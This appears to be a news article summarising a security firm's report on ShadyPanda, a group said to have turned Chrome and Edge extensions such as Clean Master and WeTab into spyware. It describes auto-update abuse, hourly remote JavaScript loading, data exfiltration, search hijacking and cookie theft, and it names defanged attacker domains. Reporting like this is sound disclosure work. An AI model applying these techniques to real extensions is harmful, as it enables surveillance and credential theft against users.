A persistent cyber threat group, identified as ShadyPanda, masterminded a sophisticated seven-year operation centered on compromised browser extensions, quietly infiltrating over 4.3 million user devices. This extensive campaign demonstrates a alarming exploitation of trust, leveraging seemingly innocuous productivity tools to siphon vast amounts of private data.

From Trust to Treachery: The Great Extension Betrayal

The initial phase of the campaign involved a deceptive shift from legitimate services to malicious spyware. As detailed in a report by Koi Security, five of the compromised extensions initially started as genuine, useful applications. However, in mid-2024, the developers introduced hidden, harmful updates, transforming them into digital spies. Before they were eventually taken down, these specific extensions had already amassed roughly 300,000 installations.

Security researcher Tuval Admoni highlighted the severity of the threat, stating that the updated extensions were set up for hourly remote code execution. This means they could download and run any arbitrary JavaScript, granting them total access to the user’s browser environment. The extensions were actively engaging in comprehensive surveillance: they monitored every website visit, stole encrypted browsing history, and created a complete digital fingerprint of the user’s browser.

In a move that further cemented the group’s deceit, one of the primary extensions, Clean Master, had even received official verification and was featured by Google. This endorsement effectively gave the attackers a veneer of legitimacy, allowing them to dramatically increase their user base and deploy their malicious updates years later without triggering user or marketplace suspicion. The sheer volume of users allowed the threat actors to execute a slow-burn strategy, weaponizing the very mechanism—the auto-update process—that is designed to keep users safe.

The scale of the operation is staggering. A separate collection of five add-ons from the same publishers was engineered for extensive user tracking. These tools meticulously recorded every single URL visited, captured all search engine queries, and logged mouse clicks, transmitting this sensitive information to servers believed to be located in China. This second set of extensions accounted for a massive four million installs, with the popular WeTab extension alone making up three million of those users.

Early warning signs of the campaign surfaced in 2023, with dozens of malicious extensions popping up on both the Chrome Web Store (20) and Microsoft Edge Addons hub (125), published under the developer names “nuggetsno15” and “rocket Zhang.” These apps were cleverly disguised as wallpaper or simple productivity tools.

Initially, their malicious activities focused on affiliate fraud. They secretly inserted tracking codes when users shopped on sites like eBay, Booking.com, or Amazon, illegally earning commissions from purchases made by the unsuspecting users.

🔎 Hijacking Searches and Stealing Data

The operation escalated significantly in early 2024. The attackers shifted their focus from passive fraud to active browser manipulation. This included redirecting users’ search queries, actively harvesting search terms, and even stealing cookies from specific websites.

One key tactic involved routing all web searches through trovi.com, a domain known to be associated with browser hijacking. Koi Security’s report noted that this action allowed the attackers to log, monetize, and sell search queries, and even manipulate the search results for their financial gain.

By mid-2024, the campaign entered a more dangerous phase. Several extensions were modified to include backdoor functionality. Once every hour, they would connect to a specific domain (“api.extensionplay[.]com”) to download and execute a JavaScript payload. This payload was the core surveillance tool, designed to monitor and encrypt every user web visit before sending the stolen data—along with a detailed browser fingerprint—to a ShadyPanda server (“api.cleanmasters[.]store”). To avoid detection, the code was heavily disguised, and it was programmed to stop its malicious behavior instantly if the browser’s developer tools were opened.

The Final Stage: Full Espionage and Credential Theft

The threat expanded to allow Adversary-in-the-Middle (AitM) attacks. This advanced capability put users at risk of credential theft, session hijacking, and the injection of arbitrary code into any website they visited.

The final observed stage centered on the extensions published around 2023 on the Microsoft Edge Addons hub, including the widely used WeTab (which is reportedly still available for download). With its massive install base, this set of extensions became a comprehensive surveillance platform, gathering every visited URL, all search queries, mouse clicks, cookies, and browser fingerprints. They were also capable of tracking user interactions on a webpage, such as scrolling behavior and time spent viewing content.

The campaign’s success, according to Koi Security, was not simply due to technical skill but a sustained exploitation of a fundamental security flaw: App marketplaces review extensions only upon submission, but they do not actively monitor what happens after they are approved and silently updated.